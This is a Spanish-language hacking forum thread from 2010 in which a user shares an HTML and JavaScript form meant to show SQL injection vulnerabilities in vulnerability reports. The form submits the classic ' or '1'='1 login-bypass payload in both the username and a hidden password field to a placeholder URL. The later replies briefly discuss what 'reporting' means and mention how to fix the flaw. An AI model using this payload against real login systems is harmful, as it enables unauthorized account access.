elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Reportar inyecciones SQL
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Reportar inyecciones SQL  (Leído 3,165 veces)
SnakingMax

Desconectado Desconectado

Mensajes: 167



Ver Perfil WWW
Reportar inyecciones SQL
« en: 5 Octubre 2010, 23:19 pm »

Os dejo un código muy sencillo en html+javascript que he utilizado para reportar inyecciones sql. Sin tener conocimientos de informática a cualquiera que se le haga el reporte puede comprobar la vulnerabilidad.


Código
  1. <script language="javascript">
  2.  
  3. function enviar()
  4. {
  5. document.getElementById('valor1').value = "' or '1'='1"+document.getElementById('valor1').value;
  6. return true;
  7. }
  8.  
  9. </script>
  10.  
  11. Acceder al primer usuario cuyo LOGIN sea:
  12.  
  13. <form method="post" action="http://www.laweb.com/accion" onsubmit="enviar();">
  14. <input name="login" id="valor1" type="text">
  15. <input name="password" value="' or '1'='1" id="valor2" type="hidden">
  16. <input value="Enviar" type="submit">
  17.  
  18. </form>
« Última modificación: 5 Octubre 2010, 23:36 pm por SnakingMax » En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


Swif EME


Ver Perfil WWW
Re: Reportar inyecciones SQL
« Respuesta #1 en: 5 Octubre 2010, 23:29 pm »

...
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: Reportar inyecciones SQL
« Respuesta #2 en: 5 Octubre 2010, 23:30 pm »

...
...
En línea

SnakingMax

Desconectado Desconectado

Mensajes: 167



Ver Perfil WWW
Re: Reportar inyecciones SQL
« Respuesta #3 en: 5 Octubre 2010, 23:38 pm »

Me había olvidado cambiar la inyección que tenía por ' or '1' = '1 y también desocultar un campo que tenía de tipo password. En la inyección en la que lo utilicé el campo password se modifica así que no se puede inyectar ahí.

Saludos
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


Swif EME


Ver Perfil WWW
Re: Reportar inyecciones SQL
« Respuesta #4 en: 5 Octubre 2010, 23:50 pm »

@SnakingMax, para vos que es reportar?
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
SnakingMax

Desconectado Desconectado

Mensajes: 167



Ver Perfil WWW
Re: Reportar inyecciones SQL
« Respuesta #5 en: 6 Octubre 2010, 00:05 am »

@SnakingMax, para vos que es reportar?

Pues para mi reportar es informar de algo (dar un reporte), y en este caso el reporte es una prueba del concepto.
Y si quieres adjuntas también info sobre como se corrige la vulnerabilidad desde la BD o desde el propio código PHP filtrando los caracteres que no se desean.

También podría haber puesto como título del post lanzador de inyecciones sql, pero le veo mejor utilidad al código como reporte en un correo electrónico.

Si me equivoco corrígeme, estoy en el foro para aprender y para aportar en lo que pueda  :D
« Última modificación: 6 Octubre 2010, 00:14 am por SnakingMax » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Reportar los mensajes de uno mismo al moderador. « 1 2 »
Sugerencias y dudas sobre el Foro
79137913 10 4,583 Último mensaje 14 Junio 2012, 19:57 pm
por Randomize
[Sugerencia] Poder reportar Topics propios (por razones obvias)
Sugerencias y dudas sobre el Foro
z3nth10n 3 2,145 Último mensaje 17 Agosto 2013, 00:21 am
por ivancea96
Inyecciones en inyecciones SQL
Nivel Web
MichBukana 1 1,997 Último mensaje 6 Octubre 2013, 00:08 am
por Stakewinner00
Reportar una vulnerabilidad
Hacking
Reck0n 7 5,601 Último mensaje 2 Noviembre 2017, 02:19 am
por Ancasu
Repórtar una pagina fraudelenta
Foro Libre
gabo1234 3 1,190 Último mensaje 22 Noviembre 2018, 15:00 pm
por Machacador
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines